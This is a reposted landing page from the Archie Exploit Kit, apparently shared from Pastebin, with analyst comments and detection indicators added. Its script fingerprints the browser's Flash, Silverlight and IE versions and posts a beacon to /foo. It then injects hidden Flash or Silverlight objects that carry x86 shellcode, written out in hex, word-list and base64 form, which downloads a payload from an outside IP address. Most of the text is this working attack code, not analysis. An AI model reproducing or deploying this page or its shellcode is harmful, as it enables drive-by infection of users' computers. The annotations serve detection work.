Nytro

Archie Exploit Kit


    

*** @PhysicalDrive0 ***

2 <html>
3 <head>
4 <script type="text/javascript" src="pluginDet.js"></script>
5 <style type="text/css">
6 html, body { height: 100%; overflow: auto; }
7 body { padding: 0; margin: 0; }
8 #form1 { height: 99%; }
9 #silverlightControlHost { text-align:center; }
10 </style>
11 <meta http-equiv="X-UA-Compatible" content="IE=edge" />
12 </head>
13 <body>
14 </body>
15 <script>
// Analyst note: the three strings below appear to carry the same x86 byte sequence in
// three encodings, one per delivery branch:
//   payload  - plain hex string (passed to flashlow.swf)
//   payload2 - comma-separated 32-bit little-endian words with a few extra leading
//              words (passed to flashhigh.swf)
//   payload3 - base64 (passed to silverapp1.xap)
// The bytes look like a small download stub: they assemble the string "urlmon" and end
// with a NUL-terminated ASCII URL. Decoding the tail of any of the three strings gives
// hxxp://144.76.36[.]67:8083/dd (defanged here), which is the network indicator to
// extract from this sample. What the stub does after the download is not established
// by this page alone.
16 var payload = "FCE8A20000006089E531D2648B52308B520C8B52148B7228528B52108B423C8B44027885C0744801D0508B48188B582001D3E33A498B348B01D631FF31C0AC84C07407C1CF0D01C7EBF43B7D2475E3588B582401D3668B0C4B8B581C01D38B048B01D0894424205A61595A51FFE0585A8B12EBA16A40680010000068000400006A006854CAAF91FFD5C389C8C1E902F2A588C180E103F2A4C331C0505051535068361A2F70FFD5C35D686F6E00006875726C6D54688E4E0EECFFD5E8B4FFFFFF505068040100006833CA8A5BFFD5508B74240401C6B065880646B02E880646B064880646B06C880646B06C880646B000
8806EB228B4C24088B1C2451E898FFFFFF688E4E0EECFFD568983A000068B0492DDBFFD5EB21E8D9FFFFFF687474703A2F2F3134342E37362E33362E36373A383038332F6464005858585858C3";
17 var payload2 = "0x0018A164,0xC0830000,0x81208b08,0xFFF830C4,0xA2E8FCFF,0x60000000,0xD231E589,0x30528B64,0x8B0C528B,0x728B1452,0x528B5228,0x3C428B10,0x7802448B,0x4874C085,0x8B50D001,0x588B1848,0xE3D30120,0x348B493A,0x31D6018B,0xACC031FF,0x0774C084,0x010DCFC1,0x3BF4EBC7,0xE375247D,0x24588B58,0x8B66D301,0x588B4B0C,0x8BD3011C,0xD0018B04,0x20244489,0x5A59615A,0x58E0FF51,0xEB128B5A,0x68406AA1,0x00001000,0x00040068,0x68006A00,0x91AFCA54,0x89C3D5FF,0x02E9C1C8,0xC188A5F2,0xF203E180,0xC031C3A4,0x5351
5050,0x1A366850,0xD5FF702F,0x6F685DC3,0x6800006E,0x6D6C7275,0x4E8E6854,0xD5FFEC0E,0xFFFFB4E8,0x685050FF,0x00000104,0x8ACA3368,0x50D5FF5B,0x0424748B,0x65B0C601,0xB0460688,0x4606882E,0x068864B0,0x886CB046,0x6CB04606,0xB0460688,0xEB068800,0x244C8B22,0x241C8B08,0xFF98E851,0x8E68FFFF,0xFFEC0E4E,0x3A9868D5,0xB0680000,0xFFDB2D49,0xE821EBD5,0xFFFFFFD9,0x70747468,0x312F2F3A,0x372E3434,0x36332E36,0x3A37362E,0x33383038,0x0064642F,0x58585858,0x9090C358";
18
19 var payload3 = "/OiiAAAAYInlMdJki1Iwi1IMi1IUi3IoUotSEItCPItEAniFwHRIAdBQi0gYi1ggAdPjOkmLNIsB1jH/McCshMB0B8HPDQHH6/Q7fSR141iLWCQB02aLDEuLWBwB04sEiwHQiUQkIFphWVpR/+BYWosS66FqQGgAEAAAaAAEAABqAGhUyq+R/9XDicjB6QLypYjBgOED8qTDMcBQUFFTUGg2Gi9w/9XDXWhvbgAAaHVybG1UaI5ODuz/1ei0////UFBoBAEAAGgzyopb/9VQi3QkBAHGsGWIBkawLogGRrBkiAZGsGyIBkawbIgGRrAAiAbrIotMJAiLHCRR6Jj///9ojk4O7P/VaJg6AABosEkt2//V6yHo2f///2h0dHA6Ly8xNDQuNzYuMzYuNjc6ODA4My9kZABYWFhYWMOQkJA=";
20
// Shared injection helper: creates a <span>, appends it to <body>, then assigns `val`
// to its innerHTML so the markup in `val` is parsed as live HTML.
// All three callers on this page (flashLow, flashHigh, silverHigh) pass <object>/<form>
// markup, so this is the point where a browser plugin gets instantiated.
21 function spanAppend(val)
22 {
23 var a = document.createElement("span");
24 document.body.appendChild(a);
// Assigned after the span is attached, so the injected markup lands in the live document.
25 a.innerHTML = val;
26 }
27
// Branch 1 loader (the dispatch switch labels this branch "2014-0497", presumably a
// CVE identifier). Injects a 1x1 Flash ActiveX <object> that loads flashlow.swf with
// allowScriptAccess=always and passes the hex `payload` string to the movie through
// FlashVars as `id`. The SWF itself is not part of this page.
// Detection: a request for flashlow.swf relative to the landing page, and a FlashVars
// `id=` value that is one long run of hex digits.
28 function flashLow()
29 {
30 spanAppend('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /><param name="movie" value="flashlow.swf" /><param name="allowScriptAccess" value="always" /><param name="FlashVars" value="id='+payload+'" /><param name="Play" valu
e="true" /></object>');
31 }
32
// Branch 2 loader (labelled "2014-0515" in the dispatch switch, presumably a CVE
// identifier). Injects a 1x1 Flash ActiveX <object> with id "23kjsdf" that loads
// flashhigh.swf and passes `payload2` (the comma-separated 0x... word list) through
// FlashVars as `sh`. The SWF itself is not part of this page.
// Detection: a request for flashhigh.swf, the fixed element id "23kjsdf", and a
// FlashVars `sh=` value made of comma-separated 0x-prefixed words.
33 function flashHigh()
34 {
35 spanAppend('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="1" height="1" id="23kjsdf"><param name="movie" value="flashhigh.swf" /><param name="FlashVars" value="sh='+payload2+'" /></object>');
36 }
37
// Branch 3 loader. Injects a Silverlight host (<form id="form1"> wrapping
// <div id="silverlightControlHost">) whose <object> loads silverapp1.xap and receives
// the base64 `payload3` string through InitParams as `payload`. The ids match the CSS
// rules in this page's <head>. The XAP itself is not part of this page.
// Detection: a request for silverapp1.xap, and an InitParams value starting with
// "payload=" followed by a long base64 string.
38 function silverHigh()
39 {
40 spanAppend('<form id="form1" runat="server" ><div id="silverlightControlHost"><object data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="100%" height="100%"><param name="source" value="silverapp1.xap"/><param name="background" value="white" /><param name="InitParams" value="payload='+p
ayload3+'" /></object></div></form>');
41 }
42
// Thin wrapper: asks PluginDetect (loaded from pluginDet.js) whether the installed
// Flash is at least version `val`. The callers on this page compare the result with
// 1 and -0.1; in PluginDetect's documented return codes those mean "installed and
// >= val" and "installed and < val" respectively (confirm against the bundled copy).
43 function fV(val)
44 {
45 return PluginDetect.isMinVersion("Flash", val);
46 }
47
// Thin wrapper: same check as fV but for Silverlight. It returns PluginDetect's
// isMinVersion result for `val`, which the caller compares with 1 and -0.1 to test
// a version range.
48 function sV(val)
49 {
50 return PluginDetect.isMinVersion("Silverlight", val);
51 }
52
// Appends a 10x10 iframe with frameBorder 0 whose src is `turl`. The only call on this
// page passes "/iebasic.html".
// The property names ("frameBorder", "width", "height", "src") and the tag name are
// held in one-letter variables and applied with bracket notation. This looks like light
// obfuscation to keep `iframe` and `src` from appearing as plain property accesses.
// Every variable here is assigned without `var`, so all of them become globals.
// `z` and `b` are set but never read in this function.
// Detection: a same-origin iframe of 10x10 px pointing at /iebasic.html.
53 function ie(turl)
54 {
55 w = "frameBorder";
56 r = "width";
57 q = "iframe";
58 s = "height";
59 z = "createElement";
60 c = "src";
61 g = '10';
62 hh = turl;
63 ha = document.createElement(q);
64 ha[w] = '0';
65 ha[r] = g;
66 ha[s] = g;
67 b = ha[c] = hh;
68 document.body.appendChild(ha);
69 return;
70 }
71
// User-agent gate: returns true only when the UA string contains "MSIE <digits>", does
// not contain "Win64;", and reports Trident/4, /5 or /6 (which corresponds to IE 8-10).
// Any exception is swallowed and the function returns false.
// Nothing on this page calls it, so it may be left over from another version of the kit.
// `regex[t](j)` is `regex.test(j)` written through a string key, the same indirection
// style used in ie(). All variables are implicit globals.
72 function ieVerOk()
73 {
74 t = "test";
75 try {
76 j = window.navigator.userAgent.toLowerCase();
77 x = /MSIE[\/\s]\d+/i [t](j);
78 m = /Win64;/i [t](j);
// RegExp.$1 holds the digit captured by the Trident test on the same line.
79 z = /Trident\/(\d)/i [t](j) ? parseInt(RegExp.$1) : null;
80 if (!m && x && z && (z == 6 || z == 5 || z == 4)) {
81 return true
82 }
83 } catch (exc) {}
84 return false
85 }
86
// Estimates the Internet Explorer major version by feature detection instead of
// reading the user-agent string: msCrypto -> 11, atob -> 10, addEventListener -> 9,
// JSON plus querySelector -> 8, XMLHttpRequest -> 7, otherwise 0.
// These features also exist in other browsers, but the caller only invokes this when
// arch() returned non-zero, i.e. when the ActiveX probe did not throw.
// `t` is assigned (as an implicit global) and never used here.
87 function ieVer() {
88 t = "test";
89 try {
90 if (window.msCrypto)
91 return 11;
92 if (window.atob)
93 return 10;
94 if (document.addEventListener)
95 return 9;
96 if (window.JSON && document.querySelector)
97 return 8;
98 if (window.XMLHttpRequest)
99 return 7;
100 } catch (exc) { }
101 return 0
102 }
103
// OS bitness probe that also serves as an "is this IE with ActiveX" test.
// It creates a Microsoft.XMLDOM ActiveX object and parses a DOCTYPE whose system
// identifier is a res:// URL pointing at iexplore.exe under "Program Files (x86)",
// a directory that only exists on 64-bit Windows. The parser's error code is then
// used as a local file-existence oracle:
//   returns 64 when parseError.errorCode is -2147023083 (0x80070715, the HRESULT form
//              of Win32 error 1813 "resource type not found", which presumably means
//              the file was located)
//   returns 32 for any other error code
//   returns 0  when anything throws, e.g. ActiveXObject is unavailable
// Detection: page script calling loadXML with a res:// DTD is a strong fingerprinting
// indicator, as there is little legitimate reason for web content to do this.
104 function arch() {
105 try
106 {
107 var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
// Synchronous load so parseError is populated before the check below.
108 xmlDoc.async = false;
109 xmlDoc.loadXML('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "res://c:\\Program Files (x86)\\Internet Explorer\\iexplore.exe">');
110 if (xmlDoc.parseError.errorCode == -2147023083)
111 {
112 return 64;
113 }
114 }
115 catch (ex)
116 {
117 return 0;
118 }
119 return 32;
120 }
121
// Fingerprinting and branch selection. Runs as soon as the script is parsed.
// Branch 1: installed Flash version string equals one of seven exact builds.
// Branch 2: Flash is in [11,3,300,257 .. 11,7,700,276) or [11,8,800,94 .. 13,0,0,183),
//           tested as "isMinVersion(lower) == 1 and isMinVersion(upper) == -0.1".
// These lists are the Flash builds the kit targets. A host at or above the upper
// bounds does not match either Flash branch.
122 var flashVer = PluginDetect.getVersion("Flash");
123 var Branch = 0;
124 if (flashVer == "11,0,1,152"
125 || flashVer == "11,1,102,55" || flashVer == "11,1,102,62"
126 || flashVer == "11,1,102,63" || flashVer == "11,2,202,228"
127 || flashVer == "11,2,202,233" || flashVer == "11,2,202,235")
128 Branch = 1;
129
130
131 if (fV("11,3,300,257") == 1 && (fV("11,7,700,276") == -0.1))
132 Branch = 2;
133 if (fV("11,8,800,94") == 1 && (fV("13,0,0,183") == -0.1))
134 Branch = 2;
135
// Silverlight is flagged when the version is in [4,0,50401,0 .. 5,1,10412,0).
136 var silverVer = PluginDetect.getVersion("Silverlight");
137 var silverBranch = 0;
138 if (sV("4,0,50401,0") == 1 && sV("5,1,10412,0") == -0.1)
139 silverBranch = 1;
140
141
// The Adobe Reader version is collected for reporting only. adoberBranch is never
// changed and no Reader branch exists in the dispatch switch.
142 var adoberVer = PluginDetect.getVersion("AdobeReader");
143 var adoberBranch = 0;
144
// arch() returns 0 when the ActiveX probe throws, so ieVersion stays 0 outside IE.
145 var archSys = arch();
146 var ieVersion = 0;
147 if (archSys != 0)
148 ieVersion = ieVer();
149
// Check-in beacon. Builds a form-style body
//   dump=<flash>|<silverlight>|<reader>|<arch>|<ieVersion>|<Branch>&ua=<UA>&ref=<referrer>
// and sends it before any plugin content is injected.
// Each piece goes through encodeURI, so on the wire the "|" separators appear as %7C
// and spaces as %20. encodeURI leaves "&" and "=" alone, so a user agent or referrer
// containing them arrives unescaped.
150 var sendstr = "";
151 sendstr += encodeURI("dump=" + flashVer + "|" + silverVer + "|" + adoberVer + "|" + archSys + "|" + ieVersion + "|" + Branch);
152 sendstr += encodeURI("&ua=" + window.navigator.userAgent);
153 sendstr += encodeURI("&ref=" + document.referrer);
154
// Fallbacks applied after the dump string was built, so the reported Branch can be 0
// even though 3 or 4 is what actually runs: Silverlight if no Flash branch matched,
// otherwise the IE path when arch() succeeded.
155 if (Branch == 0 && silverBranch == 1)
156 Branch = 3;
157 if (Branch == 0 && archSys != 0)
158 Branch = 4;
159
// Synchronous POST (third argument false) to /foo on the serving host. No request
// header is set and any failure is swallowed, so the page continues either way.
// Detection: a POST to /foo whose body starts with "dump=" and carries %7C-separated
// plugin version strings followed by "&ua=" and "&ref=".
160 try
161 {
162 var xmlhttp = new XMLHttpRequest();
163 xmlhttp.open("POST", "/foo", false);
164 xmlhttp.send(sendstr);
165 }
166 catch (exc){}
167
168
// Dispatch: exactly one delivery path runs per page load.
//   1 -> flashLow()   (flashlow.swf, hex payload)
//   2 -> flashHigh()  (flashhigh.swf, word-list payload)
//   3 -> silverHigh() (silverapp1.xap, base64 payload)
//   0 and 4 -> ie("/iebasic.html"), a 10x10 iframe. Branch 0 lands here too, so a
//              client that matched nothing still gets the iframe.
// The "2014-0497" and "2014-0515" labels are the author's own comments and presumably
// name the CVE each Flash branch targets.
169 switch (Branch)
170 {
171 //2014-0497
172 case 1:
173 flashLow();
174 break;
175
176 //2014-0515
177 case 2:
178 flashHigh();
179 break;
180
181 case 3:
182 silverHigh();
183 break;
184
185 case 0:
186 case 4:
// The two disabled lines below reference a second page, /phazar.html, that would
// have received the detected architecture as `a` (0 for 32-bit, 1 otherwise).
187 //var avar = archSys == 32 ? 0 : 1;
188 //ie("/phazar.html?a="+avar);
189
190 ie("/iebasic.html");
191 break;
192 }
193
194
195 </script>
196 </html>

Sursa: Archie Exploit Kit - Pastebin.com
